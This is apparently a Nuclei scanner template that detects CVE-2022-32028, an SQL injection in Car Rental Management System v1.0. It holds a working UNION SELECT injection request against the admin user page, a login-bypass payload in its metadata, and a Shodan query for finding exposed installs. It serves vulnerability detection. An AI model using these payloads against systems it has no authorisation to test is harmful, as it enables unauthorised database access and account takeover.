id: CVE-2022-32028 info: name: Car Rental Management System v1.0 - SQL Injection author: arafatansari severity: high description: | Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-32028 cwe-id: CWE-89 metadata: comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. shodan-query: http.html:"Car Rental Management System" verified: "true" tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" requests: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - | GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 Host: {{Hostname}} skip-variables-check: true redirects: true max-redirects: 2 cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '{{md5({{num}})}}' - type: status status: - 200